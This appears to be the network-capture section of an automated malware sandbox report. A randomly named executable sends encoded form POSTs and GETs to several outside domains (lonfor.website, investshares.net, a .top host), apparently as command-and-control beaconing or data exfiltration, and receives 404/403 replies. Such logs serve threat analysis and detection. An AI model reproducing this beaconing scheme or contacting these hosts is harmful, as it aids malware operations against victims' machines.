                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.650002199.192.21.169804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:27.008552074 CET1784OUTPOST /bowc/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.lonfor.website
                                                        Origin: http://www.lonfor.website
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.lonfor.website/bowc/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 7a 31 78 62 74 72 77 78 6a 6a 30 68 71 33 77 6f 6d 52 34 54 47 61 4b 4c 56 56 4b 47 4d 6f 33 79 47 72 73 41 4a 49 64 62 64 69 69 49 6b 55 76 49 76 77 77 31 61 42 64 4b 4c 75 51 62 50 55 66 4d 68 68 6e 2f 70 59 56 43 56 79 69 51 6c 31 55 78 6d 58 58 39 33 76 71 6e 6d 32 43 44 4a 50 39 4c 33 71 46 45 61 31 6e 30 57 77 37 57 6d 79 4f 79 37 47 53 32 70 54 78 34 4e 2f 35 51 44 31 68 76 47 4f 39 37 6f 54 49 76 51 53 53 2b 35 65 6b 75 79 70 76 74 76 46 42 5a 68 48 66 67 30 4d 2f 47 71 71 62 35 [TRUNCATED]
                                                        Data Ascii: fVnx=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39Iz1xbtrwxjj0hq3womR4TGaKLVVKGMo3yGrsAJIdbdiiIkUvIvww1aBdKLuQbPUfMhhn/pYVCVyiQl1UxmXX93vqnm2CDJP9L3qFEa1n0Ww7WmyOy7GS2pTx4N/5QD1hvGO97oTIvQSS+5ekuypvtvFBZhHfg0M/Gqqb5k/a2UWaMn2vIO2vVWSopFXvVknQqOkNmnQqVvbPx/kmWMUZ9a822RasmCVVLpcTynTbVzEIa8OQanmKAk5kFtr+VEYkm4uQsHu9i0HFiK5zs18J6pLKHZjGV81EQE2Y1eGIZ00I2MQYTIgn02J/cSqzsFf1bv6ODuiS2xR5x5VcDDD8V55ypSZ5xXAbUt3uzwReoP5ETZzKp/yBidTCIw8N58rYAj2BFjILyx3U4LqPWsa6SYA974iyHT0JDCGZ+seWIbqjy5od10kMT+HzqvyO8ZYAynj4+bjt/5CIO82Ddw8II+zTjD9d2iFdDrdUDL61OxN3/uEpwcqHLrYZzK9af8JlzxloY2v/jb4LYHA91RV38nIFqdLFGhBjZ3xoH1wGNylh5+jnrTc5FCCIl+GcghOqg10kHWq+HMihQ2VqE2zF/UT0t1OUP9fTiyhB65xMvfvm0ZoOA0tx0i/4vOYH3dJPbYww2Bfq0uHsXhM4iDCcGSQWB83c2P/Oduf5FGDDaztJLQJmdhNsXxYdeHY+TDn8zgtNb6lA3ArOoR1Os1rCcAZXAeUwdATmzsq6O9lObpUtOrDDOUhIvc9Th+RpgGdG1v0i2StEzEVFGV376nLLL9V2h6ZxVzROorPgqSWas2FuKkEjekdMU1D6kROggcNJVCujnG3 [TRUNCATED]
                                                        Jan 16, 2025 00:44:27.997697115 CET918INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:44:27 GMT
                                                        Server: Apache
                                                        Content-Length: 774
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.650003199.192.21.169804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:29.551443100 CET486OUTGET /bowc/?fVnx=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwYRaJOa9Z44z2qtPWfGvKNoA9tlUfzwY1s4wtqx/AHoNma7bQRw=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.lonfor.website
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:44:30.170164108 CET933INHTTP/1.1 404 Not Found
                                                        Date: Wed, 15 Jan 2025 23:44:30 GMT
                                                        Server: Apache
                                                        Content-Length: 774
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.650004154.197.162.239804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:35.734298944 CET753OUTPOST /cf9p/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.investshares.net
                                                        Origin: http://www.investshares.net
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.investshares.net/cf9p/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 41 6f 2f 61 6c 46 62 67 64 35 61 77 78 2b 42 65 6d 59 52 51 62 47 54 70 63 32 77 50 2b 36 50 56 61 71 43 42 39 34 61 47 33 4d 47
                                                        Data Ascii: fVnx=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIAo/alFbgd5awx+BemYRQbGTpc2wP+6PVaqCB94aG3MG
                                                        Jan 16, 2025 00:44:36.363445997 CET309INHTTP/1.1 403 Forbidden
                                                        Server: nginx
                                                        Date: Wed, 15 Jan 2025 07:44:00 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.650005154.197.162.239804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:38.296251059 CET777OUTPOST /cf9p/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.investshares.net
                                                        Origin: http://www.investshares.net
                                                        Cache-Control: max-age=0
                                                        Content-Length: 233
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.investshares.net/cf9p/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 6d 52 70 65 75 43 50 65 36 6c 58 61 53 43 54 71 30 39 4a 44 70 6c 31 72 6f 73 2f 53 49 49 67 58 33 4a 4e 74 39 71 41 56 79 6e 37 77 3d 3d
                                                        Data Ascii: fVnx=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLmRpeuCPe6lXaSCTq09JDpl1ros/SIIgX3JNt9qAVyn7w==
                                                        Jan 16, 2025 00:44:38.873895884 CET309INHTTP/1.1 403 Forbidden
                                                        Server: nginx
                                                        Date: Wed, 15 Jan 2025 07:44:03 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.650006154.197.162.239804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:40.854321003 CET1790OUTPOST /cf9p/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.investshares.net
                                                        Origin: http://www.investshares.net
                                                        Cache-Control: max-age=0
                                                        Content-Length: 1245
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.investshares.net/cf9p/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 73 2b 2b 44 57 6c 52 6d 67 31 41 71 2b 79 38 63 61 45 43 35 4f 4b 52 4b 57 70 44 73 31 4f 4b 69 45 4d 39 4f 63 53 78 6a 70 33 74 32 72 42 4c 4e 4d 70 55 68 66 66 6e 2b 70 6d 51 59 51 6b 31 55 42 73 72 56 7a 2b 54 63 63 38 67 53 45 2f 4e 41 54 56 58 6e 5a 53 50 58 4f 68 55 46 66 55 75 47 44 62 44 71 4b 66 35 4f 53 56 74 54 4a 6e 6a 4f 2f 4a 71 50 6d 36 74 59 68 6b 56 53 52 54 70 72 6e 32 5a 70 7a 54 76 79 77 37 75 55 6a 38 36 6b 4c 39 57 31 6c 41 72 71 44 57 45 6f 32 62 6e 4d 4e 78 38 [TRUNCATED]
                                                        Data Ascii: fVnx=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/s++DWlRmg1Aq+y8caEC5OKRKWpDs1OKiEM9OcSxjp3t2rBLNMpUhffn+pmQYQk1UBsrVz+Tcc8gSE/NATVXnZSPXOhUFfUuGDbDqKf5OSVtTJnjO/JqPm6tYhkVSRTprn2ZpzTvyw7uUj86kL9W1lArqDWEo2bnMNx8+I5X5VF7yxnVwtBBP2TYhnPx9lw6kVL0ZkMISQtieYUlR639d9OOLn5p3b6+KaptBL/1FdCYPBRENsxXODl1pjEkcy848zQxh2rS1ljgshYdyDCUtAJV9ZfkvQYevEQD5WWEbeVOlY0fg4Hv47JVNdck8UrR52Yev0VsMS7HqbwKr+oysbfX1SWPGSQmIIbiBnhUO23KfSkQWBjwzobYTcZ02ew/zZYXx2YK9gVVh/TccGcbLG2C2Rp9doETKhIHarqeari1Cc0SG1udzuHep4zmvGFGIX4EEz+NU1DPX84fxWpRH41K/iw9gusoFVvhxutPL2f/qrHoSpLCnkYJDyekf/FkBvWqj4THnWNvWFF/2nlFVXWCQvqfb+SsIH2cAZah3yQGDIq7ic1H/EjNHhAk8JrhZhu+MhEf2aONCeacg5giI4ne4k5rN9+PHUYkBawLi4ZqQPo8YtfDlDsOOcYUNpplF+VLKK1cuVMq1j3Xc8DF7ocXMU/R4scRF1F5ZbuXEbNflgI1N1tou+hMtaA91AWoEN+ieEXTm18plL3Wx1AYlimpMSMYQHDiKDO/r+7Wbx8lhBe5jXpAJgN0n+LVX5M0X4c3nYdQbpp6Rn8xQoi8q9TVgmmvKwizGqpy6PCOuJBfumKdDEGnzW7uFF8dnB2sybGmdT [TRUNCATED]
                                                        Jan 16, 2025 00:44:41.418874979 CET309INHTTP/1.1 403 Forbidden
                                                        Server: nginx
                                                        Date: Wed, 15 Jan 2025 07:44:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.650007154.197.162.239804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:43.394776106 CET488OUTGET /cf9p/?fVnx=tknvN2jlhTuvpXXfB7aTVyatH+optGyLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFEZ78yqKoeuU5J+b47iNq8whadf8QcoBPTRq9CV/chxpb7frDW/o=&XLc=1bXtqxM HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.investshares.net
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Jan 16, 2025 00:44:43.964854002 CET141INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 15 Jan 2025 07:44:08 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.650009134.122.133.80804140C:\Program Files (x86)\IqETCCuPgqXLXwfHdqPPQytkpRnNNEUgkrRQXPGfWnunNKajYICnjJoTTjraOUHAYjpQZcdO\xVHAYGlJzfAqXG.exe
                                                        TimestampBytes transferredDirectionData
                                                        Jan 16, 2025 00:44:58.065519094 CET765OUTPOST /jpjz/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Host: www.jrcov55qgcxp5fwa.top
                                                        Origin: http://www.jrcov55qgcxp5fwa.top
                                                        Cache-Control: max-age=0
                                                        Content-Length: 209
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Referer: http://www.jrcov55qgcxp5fwa.top/jpjz/
                                                        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                        Data Raw: 66 56 6e 78 3d 4d 75 71 68 35 56 50 4c 50 74 43 4d 6e 69 76 66 44 2b 49 74 6b 2b 39 75 44 7a 34 77 6d 6e 6c 75 54 44 6b 32 33 57 6c 47 2f 7a 70 78 37 5a 72 6d 79 56 69 77 7a 55 4f 50 31 7a 31 51 4d 46 72 52 77 69 68 2f 6f 56 68 4b 4a 6f 65 57 78 4e 62 59 6a 34 58 64 66 53 57 67 4a 62 7a 58 59 6a 32 47 6a 70 32 71 69 54 75 64 6d 47 61 54 4e 66 57 52 39 67 61 65 4c 75 57 65 47 7a 64 72 43 5a 42 4a 4f 4e 62 6f 34 4c 41 6b 48 6d 58 50 6a 77 4c 4a 78 4c 53 64 48 35 36 31 76 71 5a 62 55 66 7a 64 74 79 41 75 74 63 6e 47 37 62 46 46 77 46 42 44 49 57 4c 49 75 66 52 68 5a 45 6a 44 31 6e 6d 53 48 71 33 61 71 56 6a 62 46 6c 4e 6a
                                                        Data Ascii: fVnx=Muqh5VPLPtCMnivfD+Itk+9uDz4wmnluTDk23WlG/zpx7ZrmyViwzUOP1z1QMFrRwih/oVhKJoeWxNbYj4XdfSWgJbzXYj2Gjp2qiTudmGaTNfWR9gaeLuWeGzdrCZBJONbo4LAkHmXPjwLJxLSdH561vqZbUfzdtyAutcnG7bFFwFBDIWLIufRhZEjD1nmSHq3aqVjbFlNj
